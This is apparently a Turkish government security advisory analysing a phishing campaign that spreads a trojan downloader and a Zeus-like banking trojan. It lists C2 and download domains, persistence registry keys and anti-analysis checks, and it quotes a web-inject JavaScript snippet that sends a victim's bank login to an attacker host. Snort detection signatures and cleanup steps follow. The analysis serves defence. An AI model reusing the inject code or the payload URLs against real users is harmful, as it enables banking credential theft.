TOPIC:

Türkiye kullanıcılarını hedef alan oltalama (phishing) e-postaları ile zombi bilgisayar oluşturma saldırısı gerçekleştirilmektedir. Saldırıda ülkemizde çok sayıda müşterisi bulanan firmaların isimleri kullanılmakta ve bu firmalardan gönderilmiş gibi gösterilen e-postalar ile kurbanlar kandırılmaya çalışılmaktadır. Bu yazıda, saldırının ve gelecekte olabilecek benzer saldırıların etkilerinin azaltmasına yardımcı olmak amacıyla saldırıyı gerçekleştirmek için kullanılan zararlı yazılımların detaylı incelemesi yapılmıştır.

resim-1.png
Şekil 1 Oltalama E-postasını Gönderen Noktalar

tablo-1bucuk.png
Tablo 1 Gelen Oltalama E-postalarının Ülkelere Yüzde Göre Dağılımı

Yayılma Yöntemi

Bu yazılım oltalama (phishing) e-postalarının eklentisi olarak yayılmaya çalışmaktadır. Aşağıdaki şekil, bu zararlı yazılımın tespit edildiği oltalama e-postalarından birinin görüntüsüdür.

resim-2.png
Şekil 2 Kullanıcılara gönderilen oltalama E-posta örneği

Turkcell, THY, Vodafone, Finansbank ve FedEx gibi kurumlardan da geliyormuş gibi gözüken ve haddi zatında bu kurumlarla hiçbir ilgisi olmayan e-postalarda, kullanıcının gelen e-postadaki eklentiyi açması istenmektedir. Gelen e-postanın eklentisi Fatura_Bildirimi.pdf.zip isminde sıkıştırılmış bir arşiv dosyasıdır. Bu sıkıştırılmış arşiv dosyası içinde Fatura_Bildirimi.pdf.exe uygulama dosyası bulunmaktadır. Windows işletim sistemlerinde “Bilinen dosya türleri için uzantıları gizle” ayarı varsayılan ayar olarak etkindir. Bu ayarın değiştirilmediği sistemlerde bu dosya Fatura_Bildirimi.pdf şeklide gözükecektir [1]. Bu e-posta ve eklentisini alan kullanıcılar, PDF dosyası açmaya çalıştırdıkları takdirde, bu zararlı yazılımın kendi sistemlerine bulaşmasına neden olacaktır

resim-3.png
Şekil 3 "Bilinen dosya türleri için uzantıları gizle" ayarı etkin iken görünüm

resim-4.png
Şekil 4 "Bilinen dosya türleri için uzantıları gizle" ayarı etkin değil iken görünüm

Teknik Özellikleri

tablo-2bucuk.png
Tablo 2 Zararlı yazılım dosyaları

Zararlı yazılımın çalışma şekli zamana ve bulunduğu sistem göre değişiklik gösterebilir. Bu çalışma sırasında işletim sistemi olarak 32 bit Windows XP SP3 kullanılmıştır.
Fatura_Bildirimi.pdf.exe truva atı indirici programı (trojan downloader) özelliğinde bir zararlı yazılımdır. Bu yazılım paketlenmemiş bir formattadır. Fakat statik analizini zorlaştırmak amacıyla kullanacağı önemli API fonksiyonları çalışma sırasında belirlenip çağrılmakta [2] ve bu API fonksiyonların isimleri kodlanmış (encoded) halde tutulmaktadır. Bu zararlı yazılım çalıştığında ilk olarak kendisinin bir kopyasını oluşturmakta, oluşturulduğu bu kopyayı çalıştırmadan önce bu kopyanın kodlarında bazı değişiklik yapmaktadır [3]. Kodları değiştirilmiş bu kopya program çalışması sırasında, sistemde çalışır halde bulunan diğer işlemleri gözden geçirmekte ve eğer bu işlemler içinde zararlı yazılım analizi için kullanılan belli başlı programların isimleri varsa, zararlı yazılım farklı bir şekilde çalışmaktadır. Sistemde çalışır durumda olup olmadığına bakıldığı tespit edilen işlem isimlerinden birkaçı şunlardır:

VMwareUser.exe

netmon.exe

procmon.exe

Eğer sistemde bu isimlerden herhangi birisine ait bir işlem çalışıyorsa zararlı yazılım %AllUsersProfile% klasöründe svchost.exe isminde, kendi kopyası olan bir dosya oluşturmaktadır. Daha sonra bu dosyanın her bilgisayar açılışında işletim sistemi tarafından çalıştırılması için HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched kayıt defteri girdisini oluşturmaktadır. Bütün işlemlerin sonunda, zararlı yazılım çalıştığı sistemin 8000 inci portunda uzaktan komut satırı çalıştırma için kullanılabilecek bir arka kapı açmaktadır. Bu tür bir arka kapının, saldırganın bir işine yarama ihtimali pratikte oldukça azdır. Bu sebeple bu arka kapının, ancak zararlı yazılımı incelemek isteyen kişileri şaşırtmak için, koruma amaçlı yapılmış bir davranış biçimi olduğu düşünülmektedir.

Eğer sistemde çalışan işlem isimleri arasında zararlı yazılımın kontrol ettiği analiz programlarından herhangi birisi yoksa, zararlı yazılım ilk önce C:\WINDOWS\system32\wuauclt.exe uygulamasını kendi istediği kodları çalıştıracak şekilde başlatmaktadır [3]. Değiştirilmiş wuauclt.exe işlemi ise %AllUsersProfile%\Local Settings\Temp klasörü altında Fatura_Bildirimi.pdf.exe dosyasının kopyası olan bir dosya oluşturmaktadır. Bu dosyanın ismi ve uzantısı (com, scr, exe, …) farklı farklı olabilmektedir. Daha sonra zararlı yazılım bu dosyanın her açılışta sistem tarafında çalıştırılması için HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\2143 kayıt defteri girdisini oluşturmaktadır. Son olarak değiştirilmiş wuauclt.exe işlemi saldırının bundan sonraki aşamalarını gerçekleştirecek olan diğer zararlı yazılımı indirip çalıştırmakta ve kontrolü bu yeni zararlı yazılıma bırakmaktadır. Değiştirilmiş wuauclt.exe işleminin ikinci zararlı yazılımı indireceği adresi öğrenmek için http üzerinden bağlanmaya çalıştığı tespit edilen adresler şu şekildedir:

moid.pl

linebench.ru

maidarm.ru

wildrive .com

iprice .pl

headart.pl

Bu adreslerden birine eriştikten sonra öğrendiği ve ulaşamaya çalıştığı zararlı yazılım adresi ise şu şekildedir:

www.tabody-villa.com/bilder/Neu/spools.exe

spools.exe zararlı yazılımı, Fatura_Bildirimi.pdf.exe zararlı yazılımından farklı bir yazılımdır. Truva atı görevindedir. spools.exe programı, truva atı indirici zararlı yazılımı tarafından çalıştırıldıktan sonra, ilk önce %UserProfile%\Application Data klasörü altında kendisinin bir kopyası olan KB00599455.exe dosyasını oluşturmaktadır. Daha sonra bu dosyanın her kullanıcı oturumu açılışında sistem tarafından çalıştırılması için HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00599455.exe kayıt girdisini oluşturmaktadır. Ayrıca bu kayıt anahtarının izinlerini değiştirmekte ve silinmesini zorlaştırmaktadır. Son olarak ta spools.exe işlemi, KB00599455.exe işlemini başlatmakta ve kendini sonlandırmadan önce oluşturduğu bir bat dosyası yardımıyla, kendi işlemi sonlandıktan sonra sabit diskteki dosyasının ve bat dosyasının kendisinin silinmesini sağlamaktadır. KB00599455.exe işlemi ise temel olarak Explorer.exe işlemine kod enjekte etme görevini gerçekleştirmektedir. Bu işlem bittikten sonra kendisini sonlandırmaktadır. Enjekte edilip çalıştırılan zararlı kod ise http üzerinden aşağıdaki adresler ile iletişime geçmeye çalışmaktadır:

veryadat.ru

mantiffpif.ru

lohtikr.ru

Bu iletişimin başarı ile gerçekleştiği durumda, %UserProfile%\Application Data\E5BC3B1C\E5BC3B1C.DAT.DAT konfigürasyon dosyası oluşturulmaktadır. Bu konfigürasyon dosyasında birçok banka ve sosyal paylaşım web sitesine ait adres isimlerinin bulunduğu görülmüştür. Bunlardan birkaçı aşağıdaki gibidir:

*tdbank.com*, *finansbank.com.tr*, *garanti.com.tr*, *ingbank.com.tr*, *isbank.com.tr*, *tes.teb.com.tr*, *akbank.com*, *kuveytturk.com.tr*, *vakifbank.com.tr*, *yapikredi.com.tr*, *facebook.com*, *twitter.com*, *blogger.com*, *flickr.com*, *livejournal.com*, …
Yukarıda listelenen bankalarla alakalı bankacılık işlemlerinin arasına giren zararlı yazılım bunu JavaScript kodlarıyla gerçekleştirmektedir. Zararlı yazılıma ait konfigürasyon dosyasında ING Bank ile ilgili geçen kod parçacıkları aşağıda verilmiştir.

var __url__ = 'hxxps://custom-apistore.com/n/';
function jsLoader (url) {
var loader = document.createElement('script');
loader.type = 'text/javascript';
loader.src = url;
document.body.appendChild(loader);
}

function loadInject () {
var load = ($('#lngid').html().indexOf('User Code') == -1 ? 'tr' : 'en');
showInjectLoading();jsLoader(__url__ + '?load=' + load + '&login=' + $('input[name="h7"]').val() + '&url=ing&m=' + Math.random());
}
Yukarıdaki kod parçacığından da anlaşıldığı üzere custom-apistore.com adresine parametre olarak dil, login, banka ismi ve rastgele bir sayı gönderilmektedir. Sayfada bulunan uygulama bankaya göre özelleştirilmiş JavaScript kodunu üretmektedir.

Custom-apistore.com alan adresine ait whois bilgisi aşağıda yer almaktadır.

domain: custom-apistore.com
owner: Y***** S****
email: ******@ymail.com
address: Unalan Mh.Soyak Sitesi, Uskudar
city: Istambul
state: --
postal-code: 23133
country: TR
phone: +90.216*******
admin-c: CCOM-1981176 ******@ymail.com
tech-c: CCOM-1981176 ******@ymail.com
billing-c: CCOM-1981176 ******@ymail.com
nserver: a.ns.joker.com 184.172.157.218 2607:f0d0:1301:6d:222:19ff:fed5:f877
nserver: b.ns.joker.com 159.25.97.69
nserver: c.ns.joker.com 66.197.237.21
status: lock
created: 2012-12-13 02:34:59 UTC
modified: 2012-12-13 03:07:02 UTC
expires: 2013-12-13 02:34:59 UTC
contact-hdl: CCOM-1981176
person: Y***** S****
email: ******@ymail.com
address: Unalan Mh.Soyak Sitesi, Uskudar
city: Istambul
state: --
postal-code: 23133
country: TR
phone: +90.216*******

source: joker.com live whois service
query-time: 0.007441
db-updated: 2012-12-25 18:21:20
Yukarıdaki alan adı bilgilerinden de anlaşılacağı üzere alan adı, 2012-12-13 02:34:59 UTC tarih ve saatinde, joker.com alan adı kayıtçısı üzerinden kayıt edilmiştir.

Tespit Etme Yöntemi

İki zararlı yazılım türü de ağ üzerinden bağlanmaya çalıştıkları alan adlarının ilk önce IP adreslerini çözmeye çalışmaktadırlar. Bu sebeple oluşacak olan DNS istekleri takip edilebilir. DNS isteklerinin takibinde geç kalındığı veya mümkün olmadığı durumlarda ise bağlanılmaya çalışılan bu alan adlarının sahip olduğu IP adreslerine erişim takip edilebilir. Bunun yanında bu erişimler http protokolü üzerinden gerçekleştiği için bu http trafiğini tespit etme amaçlı IDS imzalarının oluşturulması mümkündür. Truva atı indirici özellikteki ilk zararlı yazılımın ağda tespiti için aşağıdaki saldırı tespit sistemi imzaları kullanılabilir:

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Zeus Variant C&C Connection"; flow:established,to_server; content:"POST "; nocase; depth:5; content:"|20|HTTP/1.1|0d 0a|"; content:"User-Agent|3a| Mozilla/4.0|0d 0a|"; http_header; content:"Content-Type|3A| application/x-www-form-urlencoded";http_header; sid:5001301; reference:url,www.bilgiguvenligi.gov.tr; classtype: malware-cnc;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)"; flow:to_server,established; content:"User-Agent\: Mozilla/4.0|0d 0a|"; nocase; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2003492; sid:2003492; rev:5;
Temizleme Yöntemi

resim-5.png
Şekil 5 Zararlı yazılımların otomatik çalıştırılma ayarları

Teknik özellikler bölümünde açıklandığı üzere, indirici olarak görev yapan ilk zararlı yazılım kendi kopyası olan:

C:\Documents and Settings\All Users\svchost.exe
veya

C:\Documents and Settings\All Users\Local Settings\Temp\XXXX.XXX
Dosyasını oluşturmakta ve bu programları çalıştırmak için:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ Run\SunJavaUpdateSched
veya

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\2143
Kayıt girdilerini oluşturmaktadır.

İkinci zararlı yazılım ise, kendi kopyası olan:

%UserProfile%\Application Data\KB00599455.exe
Dosyasını oluşturmakta ve bu programı çalıştırmak için:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Kayıt girdisini oluşturmaktadır.

Bu sebeple bu kayıt girdileri ve ilgili olduğu bu zararlı yazılım dosyaları silindikten sonra sistem yeniden başlatıldığı takdirde bu zararlı yazılımdan kurtulmak mümkündür.

Yukarıda bahsedilen temizleme yöntemini otomatik olarak gerçekleştirmek aşağıdaki araçlar kullanılabilir:

Tek başına çalışan son kullanıcı bilgisayarlarında çalıştırılabilecek ikili dosya için buraya tıklayın (Henüz bu araç hazırlanmamıştır.).